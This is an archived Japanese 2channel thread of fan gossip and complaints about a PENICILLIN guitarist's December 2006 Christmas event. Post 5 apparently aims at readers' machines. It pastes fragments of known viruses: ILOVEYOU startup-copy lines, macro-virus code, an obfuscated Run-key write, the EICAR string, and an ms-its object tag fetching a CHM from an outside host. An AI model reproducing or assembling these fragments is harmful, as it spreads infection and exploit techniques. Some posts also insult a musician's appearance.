5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆★PENIClLLlNの噂(69)★☆

1 :次スレたてずに埋めるなって言ってんだろゴルァ!!w:2006/12/24(日) 12:22:48
次スレは>>980が立てれ。
流れが早いときは>>950あたりで。

前スレ ☆★PENIClLLlNの噂(68)★☆
http://human5.2ch.net/test/read.cgi/uwasa/1162102958/l50

2 :名無しさん@お腹いっぱい。:2006/12/24(日) 12:27:24
1000 overしてから次スレたてるのもう何回もやってるんで
次スレはちゃんと>>980がたててくれよな!

3 :名無しさん@お腹いっぱい。:2006/12/24(日) 13:24:09
>>1乙。

4 :名無しさん@お腹いっぱい。:2006/12/24(日) 13:28:58
>1乙

5 :名無しさん@お腹いっぱい。:2006/12/24(日) 13:41:45
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???



6 :名無しさん@お腹いっぱい。:2006/12/24(日) 14:08:48
ジャンケンで勝って辞退した関係者って女だったの?

7 :名無しさん@お腹いっぱい。:2006/12/24(日) 17:25:43
女の人だったよ。

8 :名無しさん@お腹いっぱい。:2006/12/24(日) 18:29:54
辞退するくらいなら参加するなよ。マジ引いた

9 :名無しさん@お腹いっぱい。:2006/12/24(日) 18:33:05
いくらなんでもナオはそこまで馬鹿じゃないよね


10 :名無しさん@お腹いっぱい。:2006/12/24(日) 18:48:45
2ちゃんで晒されるからヲタに名前バレしたくないんだよね
とか言って関係者を装った自意識過剰なヲタだったら笑える。
どっちみち客ドン引きだし、こうやって叩かれるのにな。

11 :名無しさん@お腹いっぱい。:2006/12/24(日) 18:49:01
いつもより1000円高かったのは
有栗の忘年会費用だったんだな(ニガ

12 :名無しさん@お腹いっぱい。:2006/12/24(日) 19:13:48
>>10
だったら仮名使えばいいんじゃない?
どうせ有栗麺の女か何かでしょ

13 :名無しさん@お腹いっぱい。:2006/12/24(日) 20:08:49
>>11
\1000のうちのいくらかはスイーツ代だろうけど
それ以外の金額は抽選会のプレゼント費用に充てるのかと思いきや
麺の私物(処分品)だったしね。衣装はまだ良いとしても
過去のグッズの余り物やGISHOが壊したタンバリンとか漏れ的には
要らないものばかりだた。結局プレゼントにも金掛かったものないから忘年会費用確定だねww

14 :名無しさん@お腹いっぱい。:2006/12/24(日) 20:48:11
漏れの連れ、偽書ヲタだからタンバリン羨ましがってたぞwwwでも2階席じゃないから悔しがってたけどw

15 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:04:12
>>11
>>13
忘年会費捻出とかって、ずいぶんと嫌味な言い方してるけど
彼等は興行で生計を立ててるんだから
それは普通のことだろ?
6000円が高くて気に入らないなら
最初から参加しなければいいだろーが。

16 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:08:41
あまりにも金のかかってないプレゼントだからねw

17 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:15:06
洗いと菅家の歌も正直イラネ
会社の忘年会で聞きたくもない課長や部長の歌聞かされてる気分だったよw

18 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:16:19
昨日やっとお正月のライヌチケ佐川さんから受け取ったけど
両日とも500番軽く越えてたorz
チッタって何番位までの椰子が最前行けるんだろ?
両日こんな番号じゃ関係ないんだけどさ。

19 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:24:45
「PENICILLINとしてもCrackとしても今年最後のライブです。」
って言うから、兄出てくるのかと思った…orz

てか、バレンタイン&盤誕のライブ告知来たらしいよ。
来年は、当日じゃないってさ…。


20 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:27:07
プレゼントの中だと王子の年賀状が一番イイモノじゃない?
漏れは年賀状当たった2名が裏山だったよ。
髪も年賀状書けば文句も出なかっただろうけど
そこまでマメじゃなさそうだよね。
>>18 50番位迄なら何とか最前ゲトできそうな気がするよ。
悪徳常連が場所取りしていない場合の話だけど。

21 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:36:56
>>19
漏れも兄に少し期待してたよorz
でも兄ブログ更新キタからウレシス!(´∀`)

22 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:38:16
>>19今年も当日じゃなかったけど?
社長がいるから土日になるのは仕方ない。
むしろ漏れは土日の方が助かるし。

23 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:47:17
>>21
ブログ見てきた。
兄、自分の名前間違えてるよ…orz
HAUEIて…、ダレ? w

24 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:54:37
自分は2階の後ろにいたんだが
ライブ中、スタが2階常連を指差して
苦笑いしていたのに引いたよ

そして終わった後の
「こんなチケット代高いのに、あの内容でだいたい楽しんでいたみたいで安心しましたよ〜プッ(笑)」
って会話も心に残りました
愚痴でごめんなさい

25 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:17:05
髪の好きなタイプに香里奈が追加されてるw

26 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:25:02
髪って鷲鼻っぽい女が好きなんだね


27 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:48:31
>>25
だいぶ前からだよw

28 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:52:41
>>25
だいぶ前から追加されてたよ

29 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:55:06
PENICILLINって札幌でライブしてないよねぇ?
http://holiday22.keyblog.jp/


30 :27:2006/12/24(日) 22:56:05
被ってツッコんじゃったw

31 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:59:40
しかも28なのに27サンを語っちゃったw
酔っててすんません
メリークリスマス

32 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:06:48
>17
禿堂
ある意味リアルに忘年会な気分だたw

33 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:31:37
>24ですが
しつこくごめんご

1階のじゃんけんの時の遅出しに対しても
笑いながら指差していたけど
スタなんだから注意とかすれば良いのではないかと思いました

34 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:40:24
忘年会だから仕方ないよ。
スタや関係者って結局、客のことそう見てるって
2階席で現実が分かってよかったんじゃない?

35 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:42:43
>33
その場でスタにちゃんと仕事しろって藻舞が言えばよかったじゃん?w
スタにして見ればファン倶楽部イベントみたいな感じだし
二階常連のノリが盛り上がって見えて面白かったんだろ?
じゃんけんだって結局はファンの誰かしらの手に渡るんだから
そんなに真剣に注意する必要は感じなかったんだろ。


36 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:53:11
>>15
チケ買うときはまさか6000円も払って
新井の歌聞かされるとは思わなかったらね〜w

37 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:56:11
QDからグリーディングカードキタ―――(・∀・)―――!

38 :名無しさん@お腹いっぱい。:2006/12/25(月) 00:07:44
髪が客席に降りてきて演奏してくれただけで行った価値はあったけど
あれがなかったら本気でモニョったよ

39 :名無しさん@お腹いっぱい。:2006/12/25(月) 01:39:42
髪オタの友から那央っぽい女見たって凹みメール来たんだけど
本当に来てたの?
最近ライヌで見掛けないって話だったよね?

40 :名無しさん@お腹いっぱい。:2006/12/25(月) 02:29:49
軽くギョーカイ人だけどファンって人もいるだろうし、
招待客や関係者で(那央ではない)モデルも見に来てるだろうし、
ただのパンピヲタでも長身で細身なキツネ顔もいるだろうし、
そういうの見つけるとなんでも那央にする人いるからなぁ。
ソウルが出るから来てたってのは・・・ありえないかw

41 :名無しさん@お腹いっぱい。:2006/12/25(月) 03:01:13
確に思い込みの激しい子なんだけどね
ドリンクコーナーで見たらしいんだけど
すごく背が高くてきつめの美人で異質の雰囲気を放っていたんだとさw
せれだけで那央と決めつけるのも凄い飛躍だがw

42 :名無しさん@お腹いっぱい。:2006/12/25(月) 03:13:02
他の麺のカノもしくは奥だとは考えないんだろうか
でもナオノイローゼみたいになってる人いるよね
最初に堂々とウロウロさせたのが間違いだよな

43 :名無しさん@お腹いっぱい。:2006/12/25(月) 03:20:29
ナオノイローゼがノロウィルスに見えてしまった

44 :名無しさん@お腹いっぱい。:2006/12/25(月) 03:23:21
関係者って、よくドリンクコーナーで目撃されるよね
飲みまくってんのかよ・・・酒もタダなのか!?

45 :名無しさん@お腹いっぱい。:2006/12/25(月) 08:02:01
>44
ライブ中のドリンクは自前じゃないの?
中打ちの時はフリーだと思うけど・・。

46 :名無しさん@お腹いっぱい。:2006/12/25(月) 10:41:19
2階最前はイタタだったね。
常連の鉢巻(闘魂)と妙なプロレスマスク。
何がしたかったんだろう。
おにゃんこの時元気だったけど全然わからなかったんだけど。

47 :名無しさん@お腹いっぱい。:2006/12/25(月) 11:02:30
アフロのかけた曲で盛り上がれるなんて「私はオバサンです」って自ら言ってるようなもんだろ。
二階最前常連含め、周りで盛り上がってる椰子ら見たら実際そうだったけどねwww

48 :名無しさん@お腹いっぱい。:2006/12/25(月) 11:36:52
テレビとかの懐かし映像でみただけだからよくわからないんだけど普通だよね。
麺の世代が〜とか言う椰子出てきそうだけどやっぱりオバちゃんばっかりなんだね。


49 :名無しさん@お腹いっぱい。:2006/12/25(月) 12:03:17
別にライブを楽しんでるんだったら、
おばちゃんだろうと何だろうと、
どうでもいい話だと思うが・・・?
もっと楽しもうって気にならないんか?
チケット代払って人を貶したり、勝手に
ナオと思い込んで凹む奴の意味が判らない。


50 :名無しさん@お腹いっぱい。:2006/12/25(月) 12:46:53
噂板でマジになる椰子の意味が(ry

51 :名無しさん@お腹いっぱい。:2006/12/25(月) 13:14:31
要するに常連が嫌いだから貶したいんだろ?w
だいたいライブ自体がパーティと銘打ってるんだから
大いに盛り上がって構わないんじゃねーの?
むしろ二階席に集結してくれて良かったしね。
一階最前であれをやられたら迷惑だったと思うけどさ w


52 :名無しさん@お腹いっぱい。:2006/12/25(月) 13:51:58
おばちゃんにおばちゃんって言って何がいけないの?
2階でも1階でもウザイし迷惑は変わらないよ。
チケが用意できなかっただけでチケが用意できたら1階でやってただろうよ。
ジャイは変な鉢巻つけてたしね。

しかし一番ウザイのはライブ自体にペニ麺が髪と王子だけだった事だよ。
常連なんかよりやる気をなくした有栗番総登場。
髪オタた洩れだが有栗はマジ勘弁。
有栗麺見るために7000円近く払ったわけじゃねーよ。視ね。


53 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:06:54
千聖presentsの段階で有栗の認識が薄い方が負けだと思うが。

54 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:11:47
ペニ麺は髪と王子しか出ないのはわかってることだし、
そもそも髪ソロライヌなのにペニ麺揃えろってのが意味不明。
兄ゲストとか勝手に思い込んでアテが外れただけだろ。

有栗ゲストだってじゅうぶん予想できたことだ。
嫌ならライヌに来なきゃいいだろ。楽しかった気分に水を差すな。
事細かに自分の思い通りでなけりゃ文句タラタラのおまいがウザイ。
楽しまそうとして準備してた髪も気の毒だよな、こんな言われようは。

55 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:16:04
>52
藻舞、アホか?
髪とジローのイベントなのに他ペニ麺が出ないって文句つけてやがる w
御門違いもいいとこだよ・・ゲストなんて誰だろうが関係ない。
あくまでも髪とジローがメインなんだから
藻舞の期待してたゲストじゃないからって文句たれる筋じゃない。
どうせハクエイが出るとでも期待してたんだろうがね・・ニガ
ゲストに左右されるくらいなら最初からゲストが確約されてる場合のみ
参加すればいいだろーが。




56 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:16:08
髪もべつに>52に無理して来てもらいたくはないんジャマイカ?
むしろ積極的に楽しまないようにしてるような香具師、
来てほしくないとオモ。やってるほうも萎えるだろ。

57 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:19:55
要するに馬鹿を晒した>52みたいなのは少数意見てことだな w

58 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:24:36
オバちゃんでなおかつイタイってのが悪徳常連なわけだけど、
>52は年月と共に自動的に仲間入りするわけだw

59 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:29:14
イタイけどとりあえず盛り上がってる常連のほうが可愛げはある罠。
>>52は会場にいる意味がわからない。

60 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:30:10
52の人気に嫉妬。

61 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:31:36
悪徳常連予備軍>>52を晒すスレはここですか?

62 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:36:56
>52はどこにも馴染めないやろ・・性格歪んでるからな w

63 :名無しさん@お腹いっぱい。:2006/12/25(月) 14:38:02
パーティとか祭りとかのワイワイ感演出に有栗麺総動員ってけっこういいと思うけどな。楽しかったよ。
いらなかったのは荒いの歌だな。歌わせて欲しいとか自分から言ったらしいじゃん。
何のつもりなんだ?見苦しいから表に出ないで欲しい。

64 :名無しさん@お腹いっぱい。:2006/12/25(月) 15:49:49
>63
宴会の余興だと思えばいいじゃん?w
髪だって言ってただろ・・長年裏方作業でペニを支えてくれてるんだし
ハクエイのパンツまで洗ってくれてるんだから w
慰労の意味でスポットライト浴びせてあげるのも有りだと思うよ。

65 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:20:48
オトナ会なんだからガキのほうが資格外だろ
おうちで不二屋のケーキ食べてシャンメリーでも飲んでなさい

66 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:40:07
兄オタだけど兄出なくても楽しかったよ
ペニのライブでは兄ばっかり見てたけど
ギター弾いてる髪って凄くかっこいいな〜と思った

67 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:41:35
>>66
だろ?

68 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:42:49
うん
心変わりしそうになったw

69 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:43:53
愛は増えるもんなんだよw

70 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:38:36
まさに千聖と不愉快な仲間達だったよ。

71 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:45:32
スイーツもこだわりこだわり連呼するからおいしいのが用意されてるのかと思いきや
最低ランクのケータリングって感じだったよね。

72 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:47:55
ベリームースはなかなかおいしかったよ。
ケーキは紙皿で見た目いまいちだったけど味はどうだったのかな?

73 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:51:39
>>72
コンビニスイーツの足元にも及びません

74 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:52:41
回転寿司の100円ケーキでももっとおいしいよ。

75 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:53:32
スイーツも仕入れは1人100円もかかってないな。

76 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:55:39
>>64
それは身内の発想でしょ。
高いチケット代払って見に来てる人に失礼だよ。
労いは麺が直接彼に何かをしてあげればいい。
裏方が表にでしゃばるのは正直気分悪い。

77 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:56:56
もっと高級なスイーツをお望みなら、もっと払わないとな。

78 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:58:27
普段どんだけ高級なもん食べてんのかね、ここのセレブたちは。

79 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:58:36
うまいまずいより、食べにくいのを何とかしてくれと思った。>ケーキ
開演前に着いて食べたけど、テイクアウトすればよかったー!とちょい後悔。
ライブ自体は漏れはアフロの選曲に盛り上がれる婆だから全て楽しかったw

80 :名無しさん@お腹いっぱい。:2006/12/25(月) 18:59:48
いや、コンビニとか回転寿司とか言ってる時点で・・・プッ

81 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:01:04
安っぽいのに慣らされた味覚には不評ってことか w

82 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:04:23
DJアフロのとき会場がシラーっとしてて感じ悪かった。
有栗麺に不満だったり婆カミングアウトを避けたりいろいろあるとは思うが、
いっしょに楽しい会にしていこうって気持ちがない無粋な様だった。

83 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:12:37
テイクアウトの配慮の細かさにはちょっと感激した。

84 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:18:06
>>82
そっか。
髪もガッカリだね。カワイソ

85 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:21:06
スイーツは確かに不味かった。

86 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:22:32
>>82
盛り上がってたヤシに対して>>47みたいに
叩くヤシがいるからね

87 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:23:52
スイーツ好きのじぬんにしたら食べられた味じゃなかったよwww
500円出せばどれだけおいしいスイーツが食べられることか

88 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:25:37
>80>81
安いスイーツよりもさらに不味く高いスイーツwwww

89 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:28:33
何をしたって必ずケチつける香具師はいるからな。
気にすんな、髪。漏れにはスッゲー楽しいクリスマス会だったよ。




新井の歌を除いては。

90 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:32:17
漏れは荒井の歌はそこまで気にならなかったよ。
本人も恐縮してたし普段の労を労ってという髪の説明もあって
パーティならではの催しだと思ったから。
ゲストが不愉快なのも事前に予想してた通り。

プレゼントが処分品、グダグダジャンケンが嫌だったな。

91 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:34:52
Wiiとか愛ポッドとかそういうのがプレゼントかと思ってた
サインやポラがおまけに付くのかな〜と思ってた
有栗がそんなにお金掛ける訳なかったの忘れてたwwww

92 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:36:56
壊れたタンバリンにはニガワラだったよ。
おまえらはこんなもんでも大喜びなんだろ?てバカにされた感じ。
そんな使えないもの取っておいてある時点でニガワラだけど。

93 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:38:10
グッズも開場前には売り切れだらけ。

94 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:38:53
>>92
せめて麺のサインでも入ってたらまだ良かったと思う。

95 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:40:31
あの顔と首の境目の無い豚女のコーラスが漏れは苦手。

96 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:42:21
初めから、“CrackのX'mas&忘年会”でよくね?
わざわざ個人名でやるから兄も来るんじゃって思うんじゃん。
正直、眠くなる程つまらなかった…orz

97 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:42:51
>>95
彼女のコーラスが苦手なのかコーラスの彼女が苦手なのか、
どっちにもとれるけど明らかに後者なんだね w

98 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:43:56
ファンをサプライズで楽しませるのが苦手なのは分かってること。
ファンは期待すべきじゃないし、メンも期待させないように、
事前につまらない内容を全部公開したうえでお金取ればいいのにね。

99 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:45:24
千聖ソロの所属は有栗なんだから間違いではない罠。
王子が出るからQDでも先行があったんだと考えればほどほどに納得いく。

100 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:49:23
千聖ソロ企画で千聖ソロ曲やってカバーまで聴かせて、
眠くなる程つまらなかったとか言われるようでは髪ももうダメだな。

101 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:52:40
苦楽の曲ばっかやられてたらもっと糞だったよ。

102 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:54:49
不満は総てアンケやメルで伝えて、改善がなければ見限ればいい。
客にできるのはお金を払って見るか、お金を払わず見ないのどっちか。
選択肢があるんだからいいんジャマイカ?

103 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:55:22
ここの人たちは髪のことキライなの?

104 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:57:18
ソロに興味が無いの。

105 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:57:25
>>101
千聖ソロで千聖曲をやるという当たり前のことで文句言われるようでは、
って意味なんじゃないの?

106 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:58:24
>>104
えー
じゃあペニだけ行ってればいいじゃん。
和食の店に行ってピザが無いってクレームつけてるようなもんだよ。

107 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:58:56
>>104おまい、すでに意味不明。

108 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:58:57
改善されたことなんて無いんだから期待すんなって。
髪やジロを一瞬でも見れたら良い、スイーツは不味くて良い、
ゲストは誰でも良い、プレゼントは何でも良い、
そう思ってチケ代払わなきゃだよ!!

109 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:59:49
あの伝説のクールギャグユニットが帰ってきた!!

というのがキャッチコピーだったのに
髪とジロの2人の掛け合いなんてほとんど無かったよ。

110 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:01:47
>>108
それが当たり前なんじゃないの?
髪の歌やギターのためにお金払ってるけど?
それ以外はあってもいいしなくてもいいけどあれば楽しむよ。

111 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:02:23
>>109
それはものすごくオモタ。

112 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:02:25
>>95確かにあの女の人いらなかった。コーラスなのに声が全然聞こえなかったし。腹は出てるしw

113 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:03:03
>>110
その当たり前のことができなくて
勝手に期待して後で文句言う人が多いんだよね・・・

114 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:04:27
>>112
コーラスが活きてないよね。
見た目はしょうがないwww
むしろスタイルも顔も完璧な美女がコーラスの方がファンの嫉妬買いそうwww

115 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:06:07
もう、あれだ。
文句のあるヤツは大金積んでペニ買って、思い通りのライヌをやらせればいい。

116 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:06:56
>>109
漏れもそれを楽しみにしてたのに
ジロの出番は少ないし髪にかぶって見えないし

117 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:09:14
麺が提供するものを、気に入って受け取るか、気に入らず受け取らないか、
客にできるのはどっちかだろ?っつーの。見限るのもひとつの意思表示だよ。
それでマズイと思って改善するかどうか、そっからは麺の選択。

118 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:13:18
コーラスとベースの立ち位置、逆のほうがよくね?

119 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:16:12
良かった点まとめ

・髪が客席に降りてきてくれた
・スイーツの持ち帰りに配慮
・スイーツがおいしかった
・有栗麺が総動員で来てくれた

不満点まとめ

・関係者がプレゼント抽選に参加
・プレゼントが処分品
・新井の歌イラネ
・菅家の歌イラネ
・スイーツが不味い
・スイーツが食べにくい
・コーラスが良くない
・髪とジロの絡みが少ない
・チケット代が500円高い
・グッズが開場前に売切

120 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:20:05
・髪が客席に降りてきてくれた

これだけでもじゅうぶん良かったと思うよ。間近で見れたわけではないけど。
しげさんとの絡みとかカッコヨス すげーテンションあがった。

121 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:23:08
不満点は反省点、今後の課題点ってことでいいジャマイカ。
それをもって今回のパーチーが価値のないものだったって結論には同意できない。
楽しかった部分は皆無なのかい?完璧求めすぎ。

122 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:25:20
髪へメール送る人は褒めることをメインで送るだろうから
本人は評価高かったと思って満足してそう。

123 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:28:44
カンケさんて今何してる人なの?
昔はCD出してたよね。
今は素人なのかな?

124 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:29:20
髪も本スレだけじゃなくここも見ればいいのに。

125 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:32:06
ここも見てるよ

126 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:38:43
髪〜〜 いやっほう!!

127 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:40:01
アンケにうっかり「髪」って書きそうになる自分がいるけど、ちゃんと通じるんだね。

128 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:41:19
>>122
>>125
ウラとオモテを見せられるわけだw

129 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:44:47
スーパースターになっちゃうと誰も言ってくれないでしょ?
ってしげさんが何かで髪に言ってた。
確かにもう関係者は厳しいことを言ってくれなさそう。
客も嫌われたくないから褒めちぎるだけだろうし。
言ってくれる人とかこういう場って貴重なんだよね。
わかってんのかな、髪。

130 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:45:16
>112
マジ?漏れ2階席だったが、特に前半、髪のメインボーカルより
女コーラスの方が聞こえてマイクの音量下げろゴラァと思ったよ?
髪ソロまた聴きたいけど、毎回女コーラスと女ホーンがセットじゃないとダメなのかな・・

131 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:47:22
>>130
男ホーンは問題無しなのか。
こういうオンナの僻みは参考にしなくてもいいと思うよ、髪。

132 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:53:08
コーラスと対応させて女ホーンと書いたんだけど。
じゃあ男ホーンもなしでお願いしますw

133 :名無しさん@お腹いっぱい。:2006/12/25(月) 20:57:27
ソロ曲にコーラスは必要だしホーンはあると華やかでスチだ。
髪が必要と判断してそろえてるんだからそのまま楽しみたいな。
というヲタもここにいまつ。

134 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:00:57
ヲタの顔色うかがってばっかだと髪の表現の幅が狭められる一方のような気がしてる。
いろんなことに挑戦していく髪をいこれからもみていきたいよ。




でも新井の歌はいらないな。

135 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:22:38
新井の歌はいらなかったって結論でFA?

136 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:26:58
ブランケットとフォトセット受注生産キター

137 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:42:44
DVD通販詳細来ない。
PENIヲタからしたら有栗ウザスなんだろうけど、
苦楽ヲタからしたらPENI優先で予定ズレまくりがツライ。
9月に出るはずのミニアルバムもどっかいっちゃってるよorz

138 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:44:01
とオモタらDVD詳細キター

139 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:21:38
追加受注販売が恒例になりそうだな(ニガ

140 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:31:32
各所更新時間を見るとQDも有栗も一括管理のような。

141 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:41:17
>>54
元は音楽プロデューサーだったけど
今はただの素人みたい。

142 :名無しさん@お腹いっぱい。:2006/12/25(月) 23:55:15
>>141
???

143 :名無しさん@お腹いっぱい。:2006/12/26(火) 00:00:45
>>123

144 :名無しさん@お腹いっぱい。:2006/12/26(火) 00:15:30
666日記キター

145 :名無しさん@お腹いっぱい。:2006/12/26(火) 00:41:40
>>139
受注生産があることを見越して他のを優先的に買うとか読みが必要だな。

146 :名無しさん@お腹いっぱい。:2006/12/26(火) 00:51:13
相変わらずこのスレは
ヲタ叩きとライヌの文句たれと
女ネタ+妬みの宝庫でつねw
案の定出たアキナ批判ww

醜い醜いwww


147 :名無しさん@お腹いっぱい。:2006/12/26(火) 00:58:51
まあそれがこのスレの存在意義みたいなもんだからな。
醜くない話題は本スレのほうにどうぞ。

148 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:10:02
ライヌの文句たれは本スレでやったほうがいいとオモ。

149 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:11:57
最近本スレはウザいラルク基地が常駐してるから過疎ってるよ(ニガ

150 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:14:06
アキナも、髪の依頼を受けて出演してるプロミュージシャンなのに、
ガキやオバチャンに罵れられてこんな扱いうけるのは心外だろうね。

151 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:24:18
>>150
プロのミュージシャンなら人前に出ると批判を受けることもあると
理解してるだろうから心外じゃないと思うよ。

152 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:25:57
アキナは爺爺と髪関係以外は何に出てるの?

153 :名無しさん@お腹いっぱい。:2006/12/26(火) 01:29:42
ブサイクでデブだから批判も少ない方だよ。
髪の好みだったりしたら嫉妬からくる批判がスゴそうwww

154 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:00:04
>>151
音楽的な批判ならともかく、謂れの無い嫉妬とか僻みとか。

155 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:05:11
そのうち嫌になって依頼を断るんじゃない?>アキナ
僻みヲタは喜ぶかもしんないけど髪には損失だな。
どっちにしても代わりの女性コーラスは必要だし同じことだよ。

156 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:06:54
まちがいなくデブだけどブサイクは言い過ぎ。

157 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:19:41
>>137
